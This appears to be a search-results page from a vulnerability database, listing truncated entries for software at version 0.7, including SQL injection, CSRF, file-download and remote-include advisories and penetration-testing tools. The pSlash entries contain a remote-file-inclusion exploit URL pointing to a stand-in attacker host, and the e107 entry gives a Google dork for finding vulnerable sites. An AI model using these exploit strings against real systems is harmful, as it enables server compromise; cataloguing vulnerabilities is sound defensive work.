12 matches found
NotrinosERP vulnerable to SQL Injection
NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customer_delivery.php...
SQL injection
NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customer_delivery.php...
CVE-2023-24788
NotrinosERP v0.7 contains a SQL injection vulnerability exploitable via the OrderNumber parameter in /NotrinosERP/sales/customer_delivery.php. The vulnerability is described as an authenticated, blind (time-based) SQLi on the OrderNumber GET parameter, allowing an attacker with valid session to i...
Liman 0.7 Cross Site Request Forgery
Exploit Title: Liman v0.7 - Cross-Site Request Forgery CSRF Date: 27-03-2018 Exploit Author: George Tsimpidas Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 Version: 0.7 Tested on: 18.04.5 LTS Bionic Beaver Category: Webapp 1. Description:- There is no CSRF protection in...
BlackArch Linux v2018.06.01 - Penetration Testing Distribution
BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1981 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. ChangeLog: added more than 60 new tools added confi...
CVE-2015-1000006
Remote file download vulnerability in recent-backups v0.7 wordpress plugin...
CVE-2015-1000006
CVE-2015-1000006 corresponds to a remote file download vulnerability in the WordPress plugin recent-backups v0.7. Connected sources confirm a file‑download flaw in the plugin, with OpenVAS and WPVulnDB noting directory traversal/file download risk and WPEX exploit notes that download-file.php doe...
[ISME v0.7] IP Phone Scanning Made Easy
ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to...
e107 Plugin userjournals_menu - blog.id SQL Injection
e107 Plugin userjournals_menu - blog.id SQL Injection e107 Plugin userjournals_menu blog.id SQL injection vulnerability Author : boom3rang Greetz : H!tm@N, KHG, chs, redc00de Vulnerability : Remote SQL-injection Google Dork : inurl:"userjournals.php?blog."...
trevorchan07-rfi.txt
AYYILDIZ.ORG PreSents... Script:Trevorchan v0.7 Download: http://rel.trevorchan.org/Releasev07.zip Contact: ilker Kandemir Code: requireonce$tcconfig'rootdir'."/inc/functions.php";...
pslash07.txt
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require $lvc_include_dir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evilscripts? Greetz: str0ke, Ironfist,...
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability
pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require $lvc_include_dir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evilscripts? Greetz: str0ke, Ironfist,...